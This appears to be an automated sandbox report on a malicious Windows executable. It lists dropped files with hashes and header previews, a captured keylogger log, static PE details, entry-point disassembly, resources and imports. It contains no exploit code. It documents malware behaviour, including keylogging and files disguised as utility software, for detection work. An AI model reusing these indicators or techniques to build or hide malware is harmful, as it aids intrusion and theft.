Preview:	....[.2.0.2.4./.1.2./.1.2. .1.1.:.3.6.:.1.6. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.2.0.2.4./.1.2./.1.2. .1.1.:.3.6.:.1.6. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.2.0.2.4./.1.2./.1.2. .1.1.:.3.6.:.2.3. .R.u.n.].........[.2.0.2.4./.1.2./.1.2. .1.1.:.3.6.:.2.6. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.2.0.2.4./.1.2./.1.2. .1.1.:.3.6.:.3.1. .R.u.n.].........[.2.0.2.4./.1.2./.1.2. .1.1.:.3.6.:.3.2. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

C:\Users\user\AppData\Local\Temp\dyfwtd.exe

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4054528
Entropy (8bit):	6.41931526899004
Encrypted:	false
SSDEEP:	98304:swsFCTOMRebywOIYAXu14+MFL3MrI+rtZg+VRWKldQwsRwRHa0eQkxHodWYPWIRL:Psukx/cRAVyoqjU9sVK+
MD5:	27650AFE28BA588C759ADE95BF403833
SHA1:	6D3D03096CEE42FC07300FB0946EC878161DF8A5
SHA-256:	CA84EC6D70351B003D3CACB9F81BE030CC9DE7AC267CCE718173D4F42CBA2966
SHA-512:	767CEB499DDA76E63F9ECEAA2AA2940D377E70A2F1B8E74DE72126977C96B32E151BFF1FB88A3199167E16977B641583F8E8EA0F764A35214F6BC9A2D2814FDC
Malicious:	true
Reputation:	low
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................. .........H. .......!...@...........................[..................@...........................p=.n5....?.p.....................................................=.....................................................CODE......!....... ................. ..`DATA..........!....... .............@...BSS...........!.......!..................idata...@...p=..6....!.............@....tls..........=.......!..................rdata... ....=.......!.............@..P.rsrc...p.....?.......!.............@..P........................................................................................................................................................................................................................

C:\Users\user\Favorites\HardDiskSentine\redist\HardDiskSentinelBin.exe

Process:	C:\Users\user\AppData\Local\Temp\dyfwtd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	979567142
Entropy (8bit):	0.05590638890163692
Encrypted:	false
SSDEEP:
MD5:	599A413EE85CC3A8A223C83230DC8D54
SHA1:	5D6E856794B3AF1D96AB0319350856BD5BCE4BE6
SHA-256:	CAAB3F404A2CE6D4EFCBFEC97172CBC17D2E4A8D128F4BB42BBE677947DBB425
SHA-512:	6EF58AC644BE1B60F2E65851CEF60E81D772212CB9B127613DDB77A941B555868AD3B616B173574D2129AC5F874650D485E520AE62287C939B5581C9E6D0CC32
Malicious:	false
Reputation:	low
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................. .........H. .......!...@...........................[..................@...........................p=.n5....?.p.....................................................=.....................................................CODE......!....... ................. ..`DATA..........!....... .............@...BSS...........!.......!..................idata...@...p=..6....!.............@....tls..........=.......!..................rdata... ....=.......!.............@..P.rsrc...p.....?.......!.............@..P........................................................................................................................................................................................................................

C:\Users\user\Videos\OrionLegacy\Bin\OrionLegacyCLI.exe

Process:	C:\Users\user\Desktop\hCJ8gK9kNn.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	979567344
Entropy (8bit):	0.04446253531927003
Encrypted:	false
SSDEEP:
MD5:	BFE1D6A6FB7A4B19F7B32D9FA6F529B4
SHA1:	D03151ABB594C66390E0EEEA2E512E8D97E9B36E
SHA-256:	3B616C5242CCB77FFD37EBE1E229C38D69BA52B5AA3AD244A5A251D88A6169FD
SHA-512:	C66ED6F768A02028CDC149D104052B544E9B12A14A19DE48EC76D8412D43FA8B3F7BF01F5B50E1BB8DDAE69844C40603AA194C87E3773780443162EF78D3E402
Malicious:	false
Joe Sandbox View:	Filename: pPLwX9wSrD.exe, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........UR..;...;...;.K.d...;.2."...;...f...;.F.4...;.F.d.q.;.......;...[...;._."...;.K.f...;...:...;.F.[.D.;.F.g...;.$.e...;.F.a...;.Rich..;.................PE..L...xz.V......................#......0............@...........................0......................................&..........@.........!.........................0...................................@...............$.......@....................text...U........................... ..`.rdata..{...........................@..@.data........0...$..................@....rsrc.....!.......!..@..............@..@........................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.472664030554411
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	hCJ8gK9kNn.exe
File size:	3'136'512 bytes
MD5:	f66bc0e967e3399863a99e9bd302ac73
SHA1:	7f5d3e05a782d3f67352080d0928ae4f4e0247a8
SHA256:	e420b000de0e86869fed544967e39722370f2ac558f5e780341c4a8f365426a4
SHA512:	01cbda600acb835cfa080e38b52f9d8f58212b74ed71cda31d900938146cf75521c0dd532809f51b914bfda0ea211204c6844e2cf9c70fef7068e26ef2928a0e
SSDEEP:	49152:S9BlUVJsBsiK9d3MC+qX+EF+Zx6bwMKexczvm40:S9BlEsWl9d3MChfzbwMKemO40
TLSH:	2DE5AE22B6C0C147EAD25070D296E7F1A1683E39E7412987B3C07E9FB276EC1593B527
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........UR..;...;...;.K.d...;.2."...;...f...;.F.4...;.F.d.q.;.......;...[...;._."...;.K.f...;...:...;.F.[.D.;.F.g...;.$.e...;.F.a...;

File Icon


Icon Hash:	f1a58babada68603

Static PE Info

General

Entrypoint:	0x4830cf
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:
Time Stamp:	0x56A87A78 [Wed Jan 27 08:06:16 2016 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	e52615253ba93e77e88da2201bcab98a

Entrypoint Preview

Instruction
push 00000060h
push 004D5458h
call 00007F2B807FF4E6h
mov edi, 00000094h
mov eax, edi
call 00007F2B807FA37Eh
mov dword ptr [ebp-18h], esp
mov esi, esp
mov dword ptr [esi], edi
push esi
call dword ptr [004C14E8h]
mov ecx, dword ptr [esi+10h]
mov dword ptr [004ED0FCh], ecx
mov eax, dword ptr [esi+04h]
mov dword ptr [004ED108h], eax
mov edx, dword ptr [esi+08h]
mov dword ptr [004ED10Ch], edx
mov esi, dword ptr [esi+0Ch]
and esi, 00007FFFh
mov dword ptr [004ED100h], esi
cmp ecx, 02h
je 00007F2B807FDE9Eh
or esi, 00008000h
mov dword ptr [004ED100h], esi
shl eax, 08h
add eax, edx
mov dword ptr [004ED104h], eax
xor esi, esi
push esi
mov edi, dword ptr [004C1488h]
call 00007F2B807CDE6Ch
dec ebp
pop edx
jne 00007F2B807FDEB1h
mov ecx, dword ptr [eax+3Ch]
add ecx, eax
cmp dword ptr [ecx], 00004550h
jne 00007F2B807FDEA4h
movzx eax, word ptr [ecx+18h]
cmp eax, 0000010Bh
je 00007F2B807FDEB1h
cmp eax, 0000020Bh
je 00007F2B807FDE97h
mov dword ptr [ebp-1Ch], esi
jmp 00007F2B807FDEB9h
cmp dword ptr [ecx+00000084h], 0Eh
jbe 00007F2B807FDE84h
xor eax, eax
cmp dword ptr [ecx+000000F8h], esi
jmp 00007F2B807FDEA0h
cmp dword ptr [ecx+74h], 0Eh
jbe 00007F2B807FDE74h
xor eax, eax
cmp dword ptr [ecx+000000E8h], esi
setne al
mov dword ptr [ebp-1Ch], eax

Rich Headers

Programming Language:

[ASM] VS2003 (.NET) SP1 build 6030
[ C ] VS2003 (.NET) SP1 build 6030
[C++] VS2003 (.NET) build 3077
[C++] VS2003 (.NET) SP1 build 6030
[EXP] VS2003 (.NET) SP1 build 6030
[RES] VS2003 (.NET) build 3077
[LNK] VS2003 (.NET) SP1 build 6030

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0xe26f0	0x18b	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0xdf4b0	0x140	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xef000	0x219a18	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0xc1a30	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xd9a90	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xc1000	0xa24	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0xdf400	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xbfd55	0xbfe00	a86b6c827e5e7e0cf5fc9c41a25e4dea	False	0.4546582349348534	data	6.349271524607046	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0xc1000	0x2187b	0x21a00	9e4eab11d2823d639daa51b6b83eccfb	False	0.3397784038104089	data	5.912662755924659	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xe3000	0xbb14	0x2400	65699f99584db3dd9db5aacc00e8c82d	False	0.3504774305555556	data	4.5108554971453305	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xef000	0x219a18	0x219c00	14aa7097ae14d9835016ab88acd68716	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0xefdd0	0x134	Targa image data - RGB 64 x 65536 x 1 +32 "\001"	Korean	North Korea	0.4805194805194805
RT_CURSOR	0xefdd0	0x134	Targa image data - RGB 64 x 65536 x 1 +32 "\001"	Korean	South Korea	0.4805194805194805
RT_CURSOR	0xeff04	0xb4	Targa image data - Map 32 x 65536 x 1 +16 "\001"	Korean	North Korea	0.7
RT_CURSOR	0xeff04	0xb4	Targa image data - Map 32 x 65536 x 1 +16 "\001"	Korean	South Korea	0.7
RT_CURSOR	0xeffb8	0x134	AmigaOS bitmap font "(", fc_YSize 4294967264, 5120 elements, 2nd "\377\360?\377\377\370\177\377\377\374\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rd	Korean	North Korea	0.36363636363636365
RT_CURSOR	0xeffb8	0x134	AmigaOS bitmap font "(", fc_YSize 4294967264, 5120 elements, 2nd "\377\360?\377\377\370\177\377\377\374\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rd	Korean	South Korea	0.36363636363636365
RT_CURSOR	0xf00ec	0x134	Targa image data - RLE 64 x 65536 x 1 +32 "\001"	Korean	North Korea	0.35714285714285715
RT_CURSOR	0xf00ec	0x134	Targa image data - RLE 64 x 65536 x 1 +32 "\001"	Korean	South Korea	0.35714285714285715
RT_CURSOR	0xf0220	0x134	data	Korean	North Korea	0.37337662337662336
RT_CURSOR	0xf0220	0x134	data	Korean	South Korea	0.37337662337662336
RT_CURSOR	0xf0354	0x134	data	Korean	North Korea	0.37662337662337664
RT_CURSOR	0xf0354	0x134	data	Korean	South Korea	0.37662337662337664
RT_CURSOR	0xf0488	0x134	Targa image data 64 x 65536 x 1 +32 "\001"	Korean	North Korea	0.36688311688311687
RT_CURSOR	0xf0488	0x134	Targa image data 64 x 65536 x 1 +32 "\001"	Korean	South Korea	0.36688311688311687
RT_CURSOR	0xf05bc	0x134	Targa image data 64 x 65536 x 1 +32 "\001"	Korean	North Korea	0.37662337662337664
RT_CURSOR	0xf05bc	0x134	Targa image data 64 x 65536 x 1 +32 "\001"	Korean	South Korea	0.37662337662337664
RT_CURSOR	0xf06f0	0x134	Targa image data - Mono - RLE 64 x 65536 x 1 +32 "\001"	Korean	North Korea	0.36688311688311687
RT_CURSOR	0xf06f0	0x134	Targa image data - Mono - RLE 64 x 65536 x 1 +32 "\001"	Korean	South Korea	0.36688311688311687
RT_CURSOR	0xf0824	0x134	Targa image data - RGB - RLE 64 x 65536 x 1 +32 "\001"	Korean	North Korea	0.38636363636363635
RT_CURSOR	0xf0824	0x134	Targa image data - RGB - RLE 64 x 65536 x 1 +32 "\001"	Korean	South Korea	0.38636363636363635
RT_CURSOR	0xf0958	0x134	data	Korean	North Korea	0.44155844155844154
RT_CURSOR	0xf0958	0x134	data	Korean	South Korea	0.44155844155844154
RT_CURSOR	0xf0a8c	0x134	data	Korean	North Korea	0.4155844155844156
RT_CURSOR	0xf0a8c	0x134	data	Korean	South Korea	0.4155844155844156
RT_CURSOR	0xf0bc0	0x134	AmigaOS bitmap font "(", fc_YSize 4294966847, 3840 elements, 2nd "\377?\374\377\377\300\003\377\377\300\003\377\377\340\007\377\377\360\017\377\377\370\037\377\377\374?\377\377\376\177\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rd	Korean	North Korea	0.5422077922077922
RT_CURSOR	0xf0bc0	0x134	AmigaOS bitmap font "(", fc_YSize 4294966847, 3840 elements, 2nd "\377?\374\377\377\300\003\377\377\300\003\377\377\340\007\377\377\360\017\377\377\370\037\377\377\374?\377\377\376\177\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rd	Korean	South Korea	0.5422077922077922
RT_CURSOR	0xf0cf4	0x134	data	Korean	North Korea	0.2662337662337662
RT_CURSOR	0xf0cf4	0x134	data	Korean	South Korea	0.2662337662337662
RT_CURSOR	0xf0e28	0x134	data	Korean	North Korea	0.2824675324675325
RT_CURSOR	0xf0e28	0x134	data	Korean	South Korea	0.2824675324675325
RT_CURSOR	0xf0f5c	0x134	data	Korean	North Korea	0.3246753246753247
RT_CURSOR	0xf0f5c	0x134	data	Korean	South Korea	0.3246753246753247
RT_BITMAP	0xf1090	0x1d4e8	Device independent bitmap graphic, 200 x 200 x 24, image size 120000, resolution 3780 x 3780 px/m			0.631939353548817
RT_BITMAP	0x10e578	0xb8	Device independent bitmap graphic, 12 x 10 x 4, image size 80	Korean	North Korea	0.44565217391304346
RT_BITMAP	0x10e578	0xb8	Device independent bitmap graphic, 12 x 10 x 4, image size 80	Korean	South Korea	0.44565217391304346
RT_BITMAP	0x10e630	0x144	Device independent bitmap graphic, 33 x 11 x 4, image size 220	Korean	North Korea	0.37962962962962965
RT_BITMAP	0x10e630	0x144	Device independent bitmap graphic, 33 x 11 x 4, image size 220	Korean	South Korea	0.37962962962962965
RT_ICON	0x10e774	0x44028	Device independent bitmap graphic, 256 x 512 x 32, image size 262144			0.2361111111111111
RT_ICON	0x15279c	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512, 16 important colors	Korean	North Korea	0.34543010752688175
RT_ICON	0x15279c	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512, 16 important colors	Korean	South Korea	0.34543010752688175
RT_ICON	0x152a84	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	Korean	North Korea	0.543918918918919
RT_ICON	0x152a84	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	Korean	South Korea	0.543918918918919
RT_MENU	0x152bac	0x142	data	Korean	North Korea	0.6149068322981367
RT_MENU	0x152bac	0x142	data	Korean	South Korea	0.6149068322981367
RT_DIALOG	0x152cf0	0xc6	data	Korean	North Korea	0.6919191919191919
RT_DIALOG	0x152cf0	0xc6	data	Korean	South Korea	0.6919191919191919
RT_DIALOG	0x152db8	0xda	data	Korean	North Korea	0.7477064220183486
RT_DIALOG	0x152db8	0xda	data	Korean	South Korea	0.7477064220183486
RT_DIALOG	0x152e94	0xf4	data	Korean	North Korea	0.6639344262295082
RT_DIALOG	0x152e94	0xf4	data	Korean	South Korea	0.6639344262295082
RT_STRING	0x152f88	0x34	data	Korean	North Korea	0.5576923076923077
RT_STRING	0x152f88	0x34	data	Korean	South Korea	0.5576923076923077
RT_STRING	0x152fbc	0x66	data	Korean	North Korea	0.8627450980392157
RT_STRING	0x152fbc	0x66	data	Korean	South Korea	0.8627450980392157
RT_STRING	0x153024	0x2e	data	Korean	North Korea	0.6086956521739131
RT_STRING	0x153024	0x2e	data	Korean	South Korea	0.6086956521739131
RT_STRING	0x153054	0xe8	data	Korean	North Korea	0.75
RT_STRING	0x153054	0xe8	data	Korean	South Korea	0.75
RT_STRING	0x15313c	0x30c	data	Korean	North Korea	0.591025641025641
RT_STRING	0x15313c	0x30c	data	Korean	South Korea	0.591025641025641
RT_STRING	0x153448	0x1a8	data	Korean	North Korea	0.4080188679245283
RT_STRING	0x153448	0x1a8	data	Korean	South Korea	0.4080188679245283
RT_STRING	0x1535f0	0x1d2	data	Korean	North Korea	0.5815450643776824
RT_STRING	0x1535f0	0x1d2	data	Korean	South Korea	0.5815450643776824
RT_STRING	0x1537c4	0x68	data	Korean	North Korea	0.8076923076923077
RT_STRING	0x1537c4	0x68	data	Korean	South Korea	0.8076923076923077
RT_STRING	0x15382c	0x6e	data	Korean	North Korea	0.6272727272727273
RT_STRING	0x15382c	0x6e	data	Korean	South Korea	0.6272727272727273
RT_STRING	0x15389c	0xb0	data	Korean	North Korea	0.7102272727272727
RT_STRING	0x15389c	0xb0	data	Korean	South Korea	0.7102272727272727
RT_STRING	0x15394c	0x322	AmigaOS bitmap font "X\271", fc_YSize 28844, 9414 elements, 2nd "\030\264\310\305\265\302\310\262\344\262.", 3rd " "	Korean	North Korea	0.4975062344139651
RT_STRING	0x15394c	0x322	AmigaOS bitmap font "X\271", fc_YSize 28844, 9414 elements, 2nd "\030\264\310\305\265\302\310\262\344\262.", 3rd " "	Korean	South Korea	0.4975062344139651
RT_STRING	0x153c70	0x172	AmigaOS bitmap font "X\271", fc_YSize 29895, 9414 elements, 2nd "\210\307\265\302\310\262\344\262.", 3rd	Korean	North Korea	0.5675675675675675
RT_STRING	0x153c70	0x172	AmigaOS bitmap font "X\271", fc_YSize 29895, 9414 elements, 2nd "\210\307\265\302\310\262\344\262.", 3rd	Korean	South Korea	0.5675675675675675
RT_STRING	0x153de4	0x24	data	Korean	North Korea	0.4722222222222222
RT_STRING	0x153de4	0x24	data	Korean	South Korea	0.4722222222222222
RT_STRING	0x153e08	0x40	data	Korean	North Korea	0.671875
RT_STRING	0x153e08	0x40	data	Korean	South Korea	0.671875
RT_RCDATA	0x153e48	0x9c27a	Delphi compiled form 'TdmMain'			0.18977814605775395
RT_RCDATA	0x1f00c4	0x7cf06	Delphi compiled form 'TFilePropertiesForm2'			0.3699384465070835
RT_MESSAGETABLE	0x26cfcc	0x2840	data			0.32278726708074534
RT_MESSAGETABLE	0x26f80c	0x2840	data			0.4297360248447205
RT_MESSAGETABLE	0x27204c	0x2840	data			0.32754270186335405
RT_GROUP_CURSOR	0x27488c	0x22	Lotus unknown worksheet or configuration, revision 0x2	Korean	North Korea	1.0294117647058822
RT_GROUP_CURSOR	0x27488c	0x22	Lotus unknown worksheet or configuration, revision 0x2	Korean	South Korea	1.0294117647058822
RT_GROUP_CURSOR	0x2748b0	0x14	Lotus unknown worksheet or configuration, revision 0x1	Korean	North Korea	1.3
RT_GROUP_CURSOR	0x2748b0	0x14	Lotus unknown worksheet or configuration, revision 0x1	Korean	South Korea	1.3
RT_GROUP_CURSOR	0x2748c4	0x14	Lotus unknown worksheet or configuration, revision 0x1	Korean	North Korea	1.3
RT_GROUP_CURSOR	0x2748c4	0x14	Lotus unknown worksheet or configuration, revision 0x1	Korean	South Korea	1.3
RT_GROUP_CURSOR	0x2748d8	0x14	Lotus unknown worksheet or configuration, revision 0x1	Korean	North Korea	1.3
RT_GROUP_CURSOR	0x2748d8	0x14	Lotus unknown worksheet or configuration, revision 0x1	Korean	South Korea	1.3
RT_GROUP_CURSOR	0x2748ec	0x14	Lotus unknown worksheet or configuration, revision 0x1	Korean	North Korea	1.3
RT_GROUP_CURSOR	0x2748ec	0x14	Lotus unknown worksheet or configuration, revision 0x1	Korean	South Korea	1.3
RT_GROUP_CURSOR	0x274900	0x14	Lotus unknown worksheet or configuration, revision 0x1	Korean	North Korea	1.3
RT_GROUP_CURSOR	0x274900	0x14	Lotus unknown worksheet or configuration, revision 0x1	Korean	South Korea	1.3
RT_GROUP_CURSOR	0x274914	0x14	Lotus unknown worksheet or configuration, revision 0x1	Korean	North Korea	1.3
RT_GROUP_CURSOR	0x274914	0x14	Lotus unknown worksheet or configuration, revision 0x1	Korean	South Korea	1.3
RT_GROUP_CURSOR	0x274928	0x14	Lotus unknown worksheet or configuration, revision 0x1	Korean	North Korea	1.3
RT_GROUP_CURSOR	0x274928	0x14	Lotus unknown worksheet or configuration, revision 0x1	Korean	South Korea	1.3
RT_GROUP_CURSOR	0x27493c	0x14	Lotus unknown worksheet or configuration, revision 0x1	Korean	North Korea	1.3
RT_GROUP_CURSOR	0x27493c	0x14	Lotus unknown worksheet or configuration, revision 0x1	Korean	South Korea	1.3
RT_GROUP_CURSOR	0x274950	0x14	Lotus unknown worksheet or configuration, revision 0x1	Korean	North Korea	1.3
RT_GROUP_CURSOR	0x274950	0x14	Lotus unknown worksheet or configuration, revision 0x1	Korean	South Korea	1.3
RT_GROUP_CURSOR	0x274964	0x14	Lotus unknown worksheet or configuration, revision 0x1	Korean	North Korea	1.3
RT_GROUP_CURSOR	0x274964	0x14	Lotus unknown worksheet or configuration, revision 0x1	Korean	South Korea	1.3
RT_GROUP_CURSOR	0x274978	0x14	Lotus unknown worksheet or configuration, revision 0x1	Korean	North Korea	1.3
RT_GROUP_CURSOR	0x274978	0x14	Lotus unknown worksheet or configuration, revision 0x1	Korean	South Korea	1.3
RT_GROUP_CURSOR	0x27498c	0x14	Lotus unknown worksheet or configuration, revision 0x1	Korean	North Korea	1.3
RT_GROUP_CURSOR	0x27498c	0x14	Lotus unknown worksheet or configuration, revision 0x1	Korean	South Korea	1.3
RT_GROUP_CURSOR	0x2749a0	0x14	Lotus unknown worksheet or configuration, revision 0x1	Korean	North Korea	1.3
RT_GROUP_CURSOR	0x2749a0	0x14	Lotus unknown worksheet or configuration, revision 0x1	Korean	South Korea	1.3
RT_GROUP_CURSOR	0x2749b4	0x14	Lotus unknown worksheet or configuration, revision 0x1	Korean	North Korea	1.3
RT_GROUP_CURSOR	0x2749b4	0x14	Lotus unknown worksheet or configuration, revision 0x1	Korean	South Korea	1.3
RT_GROUP_ICON	0x2749c8	0x22	data	Korean	North Korea	1.0
RT_GROUP_ICON	0x2749c8	0x22	data	Korean	South Korea	1.0
RT_VERSION	0x2749ec	0x2ec	data	Korean	North Korea	0.48663101604278075
RT_VERSION	0x2749ec	0x2ec	data	Korean	South Korea	0.48663101604278075
RT_ANIICON	0x274cd8	0x59eeb	PC bitmap, Windows 3.x format, 46643 x 2 x 43, image size 368699, cbSize 368363, bits offset 54			0.948387867402535
RT_ANIICON	0x2cebc4	0x39e54	PC bitmap, Windows 3.x format, 29965 x 2 x 41, image size 237438, cbSize 237140, bits offset 54			0.9939613730285907

Imports

DLL	Import
WS2_32.dll	inet_addr, closesocket, getsockname, send, recv, connect, WSAStartup, gethostbyname, bind, setsockopt, WSACleanup, socket, WSARecv, WSASend, WSACloseEvent, inet_ntoa, WSASocketA, htons, WSAEventSelect, WSACreateEvent, listen, htonl, WSAGetLastError, WSAResetEvent, accept
ODBC32.dll
KERNEL32.dll	FreeLibrary, GlobalAlloc, GlobalLock, GlobalAddAtomA, InterlockedDecrement, FreeResource, GlobalFree, GlobalUnlock, lstrcmpW, lstrcatA, GlobalFindAtomA, GlobalGetAtomNameA, SetLastError, MulDiv, FindClose, FindNextFileA, FileTimeToSystemTime, FileTimeToLocalFileTime, FindFirstFileA, GetPrivateProfileIntA, WritePrivateProfileStringA, GetPrivateProfileStringA, InterlockedIncrement, GlobalFlags, LocalAlloc, LocalFree, GlobalReAlloc, GlobalDeleteAtom, TlsGetValue, TlsAlloc, TlsSetValue, LocalReAlloc, TlsFree, FormatMessageA, GlobalSize, CopyFileA, MoveFileA, FlushFileBuffers, LockFile, UnlockFile, SetEndOfFile, GetFileSize, DuplicateHandle, GetVolumeInformationA, GetFullPathNameA, GetShortPathNameA, GetCPInfo, GetOEMCP, SystemTimeToFileTime, SetErrorMode, LocalFileTimeToFileTime, SetFileTime, SetFileAttributesA, GetFileAttributesA, GetFileTime, LocalUnlock, LocalLock, GetTempFileNameA, GetDiskFreeSpaceA, ExitThread, GetTimeFormatA, GetDateFormatA, VirtualProtect, RtlUnwind, GetDriveTypeA, GetStartupInfoA, GetCommandLineA, SetLocalTime, TerminateProcess, HeapSize, QueryPerformanceCounter, UnhandledExceptionFilter, GetTimeZoneInformation, LCMapStringA, LCMapStringW, FatalAppExitA, GetStdHandle, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetHandleCount, GetFileType, SetConsoleCtrlHandler, GetStringTypeA, GetStringTypeW, SetStdHandle, GetUserDefaultLCID, EnumSystemLocalesA, IsValidLocale, IsValidCodePage, IsBadReadPtr, IsBadCodePtr, GetLocaleInfoW, SetEnvironmentVariableA, GetProcAddress, ConvertDefaultLocale, EnumResourceLanguagesA, LoadLibraryA, CreateThread, UnregisterWaitEx, FlushInstructionCache, GetCurrentDirectoryA, SetCurrentDirectoryA, lstrcpynA, ReleaseMutex, ReleaseSemaphore, CreateSemaphoreA, IsDBCSLeadByte, CreateDirectoryA, SetThreadIdealProcessor, GetQueuedCompletionStatus, WaitForMultipleObjects, PostQueuedCompletionStatus, GetTickCount, SetEvent, SetProcessPriorityBoost, CreateEventA, CreateIoCompletionPort, SwitchToThread, Sleep, HeapReAlloc, VirtualAlloc, HeapValidate, HeapAlloc, VirtualFree, HeapFree, HeapCreate, HeapDestroy, OutputDebugStringA, SuspendThread, ResumeThread, IsDebuggerPresent, DebugBreak, IsBadWritePtr, GetSystemTimeAsFileTime, SetThreadPriority, GetCurrentProcessId, WriteFile, SetFilePointer, GetLocalTime, GetCurrentThreadId, VirtualQuery, GetCurrentProcess, GlobalMemoryStatus, CreateFileA, ReadFile, MoveFileExA, DeleteFileA, SetUnhandledExceptionFilter, GetCurrentThread, GetThreadContext, GetSystemInfo, GetModuleHandleA, lstrcmpA, lstrlenA, lstrcmpiA, lstrcmpiW, GetStringTypeExA, GetStringTypeExW, lstrlenW, CompareStringA, CompareStringW, GetEnvironmentVariableA, MultiByteToWideChar, GetEnvironmentVariableW, GetVersion, DeleteTimerQueueTimer, lstrcpyA, LoadResource, LockResource, SizeofResource, FindResourceA, WideCharToMultiByte, GetThreadLocale, GetLocaleInfoA, GetACP, GetVersionExA, InterlockedExchange, RaiseException, WaitForSingleObject, CreateMutexA, GetLastError, CloseHandle, GetModuleFileNameA, ExitProcess, DeleteCriticalSection, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, GlobalHandle
USER32.dll	BringWindowToTop, SetRectEmpty, CreatePopupMenu, InsertMenuItemA, LoadAcceleratorsA, LoadMenuA, ReuseDDElParam, UnpackDDElParam, IsClipboardFormatAvailable, MessageBeep, SetRect, GetTabbedTextExtentA, IsRectEmpty, UnionRect, GetDCEx, LockWindowUpdate, GetSystemMenu, SetParent, SetMenu, TranslateAcceleratorA, DestroyMenu, GetMenuItemInfoA, InflateRect, GetDialogBaseUnits, DestroyIcon, GetSysColorBrush, GetMenuStringA, AppendMenuA, RemoveMenu, InsertMenuA, DeleteMenu, WaitMessage, GetWindowThreadProcessId, ReleaseCapture, WindowFromPoint, SetCapture, GetWindowDC, ClientToScreen, GrayStringA, DrawTextExA, DrawTextA, TabbedTextOutA, FillRect, ScrollWindowEx, IsDialogMessageA, IsDlgButtonChecked, SetDlgItemTextA, SetDlgItemInt, GetDlgItemTextA, GetDlgItemInt, CheckRadioButton, CheckDlgButton, RegisterWindowMessageA, WinHelpA, GetCapture, GetClassLongA, GetClassInfoExA, GetClassNameA, SetPropA, GetPropA, RemovePropA, SendDlgItemMessageA, IsChild, GetWindowTextLengthA, GetForegroundWindow, BeginDeferWindowPos, EndDeferWindowPos, GetTopWindow, GetMessageTime, GetMessagePos, MapWindowPoints, TrackPopupMenuEx, TrackPopupMenu, SetScrollRange, GetScrollRange, SetScrollPos, GetScrollPos, SetForegroundWindow, ShowScrollBar, GetMenu, GetSubMenu, GetMenuItemID, GetMenuItemCount, GetSysColor, 